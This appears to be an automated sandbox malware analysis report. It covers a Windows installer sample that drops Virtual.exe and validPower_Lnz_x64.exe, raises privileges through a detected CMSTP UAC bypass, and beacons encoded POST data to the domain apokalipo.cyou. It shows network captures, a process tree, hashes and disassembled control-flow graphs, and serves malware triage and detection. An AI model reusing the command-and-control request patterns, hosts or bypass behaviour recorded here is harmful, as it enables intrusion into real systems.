                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ceb691fc9aa41f5-EWR
                                                          2024-10-07 05:14:58 UTC | 24 | IN | Data Raw: 31 32 0d 0a 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 90 0d 0a
                                                          Data Ascii: 12
                                                          2024-10-07 05:14:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          2 | 192.168.2.4 | 49741 | 188.114.96.3 | 443 | 344 | C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-10-07 05:14:58 UTC | 439 | OUT | POST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                          title: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2Yutg
                                                          Content-Length: 208
                                                          Host: apokalipo.cyou
                                                          2024-10-07 05:14:58 UTC | 208 | OUT | Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 3c 00 00 00 a2 27 b0 24 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ae 2b bc 28 9e cc 9c 6e 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ae 2b bc 28 5c 47 0a 0a 20 0c 0c 0c 0c 0c 0c 0c 21 0c 21 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 5c 47 0a 0b 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0d 0c 0c 0c 5c 47 09 0a 0c 0c 0c 0c f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 0c 0c f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 40 7b fe a6 09 23 99 c4 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                          Data Ascii: <'$+(n+(\G !!\G\G@{#
                                                          2024-10-07 05:14:58 UTC | 558 | IN | HTTP/1.1 204 No Content
                                                          Date: Mon, 07 Oct 2024 05:14:58 GMT
                                                          Connection: close
                                                          op: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2Yutg
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aRugRMSHHrm7120bDmLPpPSETiQUMEM6vRRe1bMJ%2Fsa6H36gVQU7XY5cGXupYQfs8ndLCT%2F95IwnFpB%2FVGIC7fFP%2BQm41J%2FJ0pDFOtPR2ZiRqn71uil2QLGdpdTDoCClOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ceb69253d61427c-EWR


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          3 | 192.168.2.4 | 49973 | 188.114.96.3 | 443 | 4960 | C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-10-07 05:15:41 UTC | 367 | OUT | POST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                          Content-Length: 96
                                                          Host: apokalipo.cyou
                                                          2024-10-07 05:15:41 UTC | 96 | OUT | Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 2d 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                          Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                          2024-10-07 05:15:42 UTC | 580 | IN | HTTP/1.1 200 OK
                                                          Date: Mon, 07 Oct 2024 05:15:42 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          op: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2Yutg
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X8bjh7uZee6EDq%2BpXPHEg%2BY4vfJCMwtDuSI8FmlQ33e1CSky9B8kSPxbp0s5VD9%2Bp6YAPIIkhkG3dzo1g7OLVEHE3WGkb7O2jGtHQvvgcXyb9YZTXez%2B5g%2F1LJONM%2Bl80Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ceb6a333d5e0f9b-EWR


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          4 | 192.168.2.4 | 49979 | 188.114.96.3 | 443 | 4960 | C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-10-07 05:15:42 UTC | 438 | OUT | POST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                          title: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2Yutg
                                                          Content-Length: 53
                                                          Host: apokalipo.cyou
                                                          2024-10-07 05:15:42 UTC | 53 | OUT | Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                          Data Ascii:
                                                          2024-10-07 05:15:43 UTC | 508 | IN | HTTP/1.1 200 OK
                                                          Date: Mon, 07 Oct 2024 05:15:43 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8LXzDY1TXizbHqC7SlFF0f2n3gIrWYy%2F5kD40hHVq4XwqVhbcxX6lqfpWfmJUoZnm41WIt9JRG1oAJjlH4K94%2BP%2FIloXNnO5JG0H9OfENgY1%2BW1f4tq43QyleTwbyFjarA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ceb6a396dbe42ad-EWR
                                                          2024-10-07 05:15:43 UTC | 29 | IN | Data Raw: 31 37 0d 0a 07 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 91 ce 24 b0 27 a2 0d 0a
                                                          Data Ascii: 17$'
                                                          2024-10-07 05:15:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0



                                                          Target ID:0
                                                          Start time:01:14:05
                                                          Start date:07/10/2024
                                                          Path:C:\Users\user\Desktop\KClGcCpDAP.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\KClGcCpDAP.exe"
                                                          Imagebase:0x870000
                                                          File size:8'656'211 bytes
                                                          MD5 hash:61D2BAF57C3ED6EDA2D72720FC54ED04
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:01:14:06
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe" -burn.clean.room="C:\Users\user\Desktop\KClGcCpDAP.exe" -burn.filehandle.attached=524 -burn.filehandle.self=544
                                                          Imagebase:0xd00000
                                                          File size:8'631'353 bytes
                                                          MD5 hash:4ED56BCA0F099784A4A341321C3D0695
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 8%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:01:14:06
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe"
                                                          Imagebase:0x7ff6c5670000
                                                          File size:3'559'696 bytes
                                                          MD5 hash:C8A2DE7077F97D4BCE1A44317B49EF41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1722899571.0000000003F99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:01:14:08
                                                          Start date:07/10/2024
                                                          Path:C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                                                          Imagebase:0x7ff718370000
                                                          File size:3'559'696 bytes
                                                          MD5 hash:C8A2DE7077F97D4BCE1A44317B49EF41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1778571972.0000000003DF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:01:14:08
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\cmd.exe
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2022025745.0000000005366000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:01:14:08
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:01:14:33
                                                          Start date:07/10/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          Imagebase:0x140000000
                                                          File size:2'364'728 bytes
                                                          MD5 hash:967F4470627F823F4D7981E511C9824F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2221794602.00000000025FE000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:01:14:46
                                                          Start date:07/10/2024
                                                          Path:C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe"
                                                          Imagebase:0x7ff718370000
                                                          File size:3'559'696 bytes
                                                          MD5 hash:C8A2DE7077F97D4BCE1A44317B49EF41
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.2162614521.0000000003A96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:01:14:46
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\cmd.exe
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2216100615.0000000003390000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2217981386.000000000554C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:01:14:46
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:01:14:57
                                                          Start date:07/10/2024
                                                          Path:C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe"
                                                          Imagebase:0x7ff718370000
                                                          File size:3'559'696 bytes
                                                          MD5 hash:C8A2DE7077F97D4BCE1A44317B49EF41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.2272761676.000000000361D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:18
                                                          Start time:01:14:58
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\cmd.exe
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.2475629890.0000000004EEA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:01:14:58
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:20
                                                          Start time:01:15:19
                                                          Start date:07/10/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          Imagebase:0x140000000
                                                          File size:2'364'728 bytes
                                                          MD5 hash:967F4470627F823F4D7981E511C9824F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2662759098.0000000002626000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          Has exited:true


                                                            Control-flow Graph

                                                            control_flow_graph 704 873cc4-873d51 call 89f8e0 * 2 GetFileAttributesW 709 873d85-873d88 704->709 710 873d53-873d5a GetLastError 704->710 711 8740d5 709->711 712 873d8e-873d91 709->712 713 873d5f-873d61 710->713 714 873d5c-873d5e 710->714 719 8740da-8740e3 711->719 715 873d93-873da6 SetFileAttributesW 712->715 716 873dca-873dd1 712->716 717 873d63-873d6c 713->717 718 873d6e 713->718 714->713 715->716 720 873da8-873dae GetLastError 715->720 721 873dd3-873dda 716->721 722 873de0-873de8 716->722 717->718 718->709 723 873d70-873d71 718->723 724 8740e5-8740e6 FindClose 719->724 725 8740ec-8740f3 719->725 726 873db0-873db9 720->726 727 873dbb 720->727 721->722 728 874058 721->728 729 873e25-873e40 call 872d58 722->729 730 873dea-873dfe GetTempPathW 722->730 731 873d76-873d80 call 873821 723->731 724->725 732 8740f5-8740fb call 8b5636 725->732 733 874100-874112 call 89e06f 725->733 726->727 737 873dc2-873dc8 727->737 738 873dbd 727->738 739 87405e-87406c RemoveDirectoryW 728->739 729->725 750 873e46-873e62 FindFirstFileW 729->750 730->729 740 873e00-873e06 GetLastError 730->740 731->725 732->733 737->731 738->737 739->719 745 87406e-874074 GetLastError 739->745 746 873e13 740->746 747 873e08-873e11 740->747 751 874076-874079 745->751 752 87407f-874085 745->752 748 873e15 746->748 749 873e1a-873e20 746->749 747->746 748->749 749->731 755 873e64-873e6a GetLastError 750->755 756 873e89-873e93 750->756 751->752 753 874087-874089 752->753 754 8740a1-8740a3 752->754 757 8740a5-8740ab 753->757 758 87408b-87409d MoveFileExW 753->758 754->719 754->757 759 873e77 755->759 760 873e6c-873e75 755->760 761 873e95-873e9e 756->761 762 873eba-873ee0 call 872d58 756->762 765 873ffa-874004 call 873821 757->765 758->757 764 87409f 758->764 766 873e7e-873e7f 759->766 767 873e79 759->767 760->759 768 873ea4-873eab 761->768 769 873fbd-873fcd FindNextFileW 761->769 762->719 775 873ee6-873ef3 762->775 764->754 765->719 766->756 767->766 
768->762 774 873ead-873eb4 768->774 771 873fcf-873fd5 769->771 772 87404d-874052 GetLastError 769->772 771->756 776 874054-874056 772->776 777 8740b0-8740b6 GetLastError 772->777 774->762 774->769 779 873ef5-873ef7 775->779 780 873f22-873f29 775->780 776->739 781 8740c3 777->781 782 8740b8-8740c1 777->782 779->780 783 873ef9-873f09 call 872b0c 779->783 786 873fb7 780->786 787 873f2f-873f31 780->787 784 8740c5 781->784 785 8740ca-8740d0 781->785 782->781 783->719 796 873f0f-873f18 call 873cc4 783->796 784->785 785->765 786->769 789 873f33-873f46 SetFileAttributesW 787->789 790 873f4c-873f5a DeleteFileW 787->790 789->790 792 873fda-873fe0 GetLastError 789->792 790->786 793 873f5c-873f5e 790->793 797 873fe2-873feb 792->797 798 873fed 792->798 794 873f64-873f81 GetTempFileNameW 793->794 795 87402b-874031 GetLastError 793->795 799 873f87-873fa4 MoveFileExW 794->799 800 874009-87400f GetLastError 794->800 801 874033-87403c 795->801 802 87403e 795->802 812 873f1d 796->812 797->798 804 873ff4-873ff5 798->804 805 873fef 798->805 808 873fa6-873fad 799->808 809 873faf 799->809 806 874011-87401a 800->806 807 87401c 800->807 801->802 810 874045-87404b 802->810 811 874040 802->811 804->765 805->804 806->807 813 874023-874029 807->813 814 87401e 807->814 815 873fb5 MoveFileExW 808->815 809->815 810->765 811->810 812->786 813->765 814->813 815->786
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00873D40
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00873D53
                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 00873D9E
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00873DA8
                                                            • GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 00873DF6
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00873E00
                                                            • FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 00873E53
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00873E64
                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 00873F3E
                                                            • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000001,00000000,?), ref: 00873F52
                                                            • GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 00873F79
                                                            • MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 00873F9C
                                                            • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00873FB5
                                                            • FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 00873FC5
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00873FDA
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00874009
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0087402B
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0087404D
                                                            • RemoveDirectoryW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00874064
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0087406E
                                                            • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00874095
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 008740B0
                                                            • FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 008740E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
                                                            • String ID: *.*$DEL$dirutil.cpp
                                                            • API String ID: 1544372074-1252831301
                                                            • Opcode ID: b5883baa41e41d34fd5d162e7151fdb953296edcbf378a8bb4a652f2ee3c5c66
                                                            • Instruction ID: 8680cef5a7a2b4ab91789ef9da73883dc6c05000ec01084935559924f4f134d3
                                                            • Opcode Fuzzy Hash: b5883baa41e41d34fd5d162e7151fdb953296edcbf378a8bb4a652f2ee3c5c66
                                                            • Instruction Fuzzy Hash: 6BB10A73D01639ABDB315A688C05B9ABA75FF40760F0182A1EE0CF7194DB72DE90DE91

                                                            Control-flow Graph

                                                            control_flow_graph 816 875195-875243 call 89f8e0 * 2 GetModuleHandleW call 8b04f8 call 8b06ae call 87120a 827 875245 816->827 828 875259-87526a call 8742d7 816->828 829 87524a-875254 call 8b0237 827->829 834 875273-87528f call 875618 CoInitializeEx 828->834 835 87526c-875271 828->835 836 8754d4-8754db 829->836 841 875291-875296 834->841 842 875298-8752a4 call 8afcae 834->842 835->829 838 8754dd-8754e3 call 8b5636 836->838 839 8754e8-8754ea 836->839 838->839 844 8754ec-8754f3 839->844 845 8754fa-875518 call 87d82f call 88a8d6 call 88ab24 839->845 841->829 852 8752a6 842->852 853 8752b8-8752c7 call 8b0e07 842->853 844->845 848 8754f5 call 8841ec 844->848 865 875546-875559 call 874fa4 845->865 866 87551a-875522 845->866 848->845 855 8752ab-8752b3 call 8b0237 852->855 863 8752d0-8752df call 8b2af7 853->863 864 8752c9-8752ce 853->864 855->836 873 8752e1-8752e6 863->873 874 8752e8-8752f7 call 8b3565 863->874 864->855 876 875560-875567 865->876 877 87555b call 8b3a35 865->877 866->865 869 875524-875527 866->869 869->865 872 875529-875544 call 88434c call 875602 869->872 872->865 873->855 884 875300-87531f GetVersionExW 874->884 885 8752f9-8752fe 874->885 881 87556e-875575 876->881 882 875569 call 8b2efe 876->882 877->876 887 875577 call 8b1479 881->887 888 87557c-875583 881->888 882->881 890 875321-87532b GetLastError 884->890 891 875359-87539e call 8733c7 call 875602 884->891 885->855 887->888 893 875585 call 8afdbd 888->893 894 87558a-87558c 888->894 896 87532d-875336 890->896 897 875338 890->897 916 8753b1-8753c1 call 88752a 891->916 917 8753a0-8753ab call 8b5636 891->917 893->894 900 875594-87559b 894->900 901 87558e CoUninitialize 894->901 896->897 904 87533f-875354 call 873821 897->904 905 87533a 897->905 902 8755d6-8755df call 8b0113 900->902 903 87559d-87559f 900->903 901->900 919 8755e6-8755ff call 8b0802 call 89e06f 902->919 920 8755e1 call 8745ee 902->920 907 8755a5-8755ab 903->907 908 8755a1-8755a3 
903->908 904->855 905->904 913 8755ad-8755c6 call 883d85 call 875602 907->913 908->913 913->902 935 8755c8-8755d5 call 875602 913->935 931 8753c3 916->931 932 8753cd-8753d6 916->932 917->916 920->919 931->932 936 87549e-8754ab call 874d39 932->936 937 8753dc-8753df 932->937 935->902 943 8754b0-8754b4 936->943 940 875476-875492 call 874ae5 937->940 941 8753e5-8753e8 937->941 949 8754c0-8754d2 940->949 953 875494 940->953 945 87544e-87546a call 8748ef 941->945 946 8753ea-8753ed 941->946 948 8754b6 943->948 943->949 945->949 960 87546c 945->960 951 875426-875442 call 874a88 946->951 952 8753ef-8753f2 946->952 948->949 949->836 951->949 962 875444 951->962 956 8753f4-8753f9 952->956 957 875403-875416 call 874c86 952->957 953->936 956->957 957->949 963 87541c 957->963 960->940 962->945 963->951
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00875217
                                                              • Part of subcall function 008B04F8: InitializeCriticalSection.KERNEL32(008DB5FC,?,00875223,00000000,?,?,?,?,?,?), ref: 008B050F
                                                              • Part of subcall function 0087120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0087523F,00000000,?), ref: 00871248
                                                              • Part of subcall function 0087120A: GetLastError.KERNEL32(?,?,?,0087523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00871252
                                                            • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00875285
                                                              • Part of subcall function 008B0E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 008B0E28
